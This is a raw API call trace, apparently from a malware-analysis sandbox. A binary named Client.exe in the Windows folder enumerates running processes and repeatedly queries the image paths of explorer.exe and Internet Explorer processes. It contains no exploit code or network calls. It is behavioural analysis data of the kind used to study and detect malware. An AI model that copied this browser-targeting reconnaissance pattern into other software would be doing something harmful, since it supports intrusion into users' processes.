CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0292.188] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.189] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.190] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.191] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.191] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.192] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.193] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.194] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.309] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.310] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.311] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.312] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.313] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.314] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.315] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.316] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.317] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.317] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.318] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.320] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.321] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.321] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.322] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.323] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.324] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.325] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.326] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x390) returned 0x178 [0292.327] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="") returned 0x0 [0292.328] CloseHandle (hObject=0x178) returned 1 [0292.328] CloseHandle (hObject=0x170) returned 1 [0292.328] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0292.328] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18faf0) returned 1 [0292.330] CloseHandle (hObject=0x170) returned 1 [0292.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0292.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0292.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x9d92a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\explorer.exe.exee", lpUsedDefaultChar=0x0) returned 23 [0292.330] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.330] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd48) returned 1 [0292.333] CloseHandle (hObject=0x170) returned 1 [0292.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0292.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0292.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x9e6e30, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpUsedDefaultChar=0x0) returned 53 [0292.334] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.334] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd40) returned 1 [0292.337] CloseHandle (hObject=0x170) returned 1 [0292.337] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.337] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd48) returned 1 [0292.340] CloseHandle (hObject=0x170) returned 1 [0292.340] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.340] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd48) returned 1 [0292.344] CloseHandle (hObject=0x170) returned 1 [0292.344] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0292.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x860) returned 0x170 [0292.344] GetPriorityClass (hProcess=0x170) returned 0x20 [0292.344] CloseHandle (hObject=0x170) returned 1 [0292.344] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x860) returned 0x170 [0292.344] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd44) returned 1 [0292.348] CloseHandle (hObject=0x170) returned 1 [0292.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0292.457] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.458] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.459] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.459] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.461] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.461] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.462] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.463] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.464] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.465] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.466] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.467] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.468] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.469] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.469] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.470] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.471] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.472] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.473] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.474] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.475] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.476] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.477] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.478] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.479] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.480] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.481] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.482] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x178 [0292.483] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0292.483] CloseHandle (hObject=0x178) returned 1 [0292.483] CloseHandle (hObject=0x170) returned 1 [0292.483] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.483] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18faf0) returned 1 [0292.485] CloseHandle (hObject=0x170) returned 1 [0292.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0292.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0292.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x9e6e30, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpUsedDefaultChar=0x0) returned 53 [0292.485] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x860) returned 0x170 [0292.485] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd48) returned 1 [0292.489] CloseHandle (hObject=0x170) returned 1 [0292.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0292.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0292.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=53, lpMultiByteStr=0x9e6e30, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpUsedDefaultChar=0x0) returned 53 [0292.489] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x860) returned 0x170 [0292.489] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd40) returned 1 [0292.634] CloseHandle (hObject=0x170) returned 1 [0292.634] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x860) returned 0x170 [0292.634] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd48) returned 1 [0292.637] CloseHandle (hObject=0x170) returned 1 [0292.637] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x860) returned 0x170 [0292.637] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd48) returned 1 [0292.640] CloseHandle (hObject=0x170) returned 1 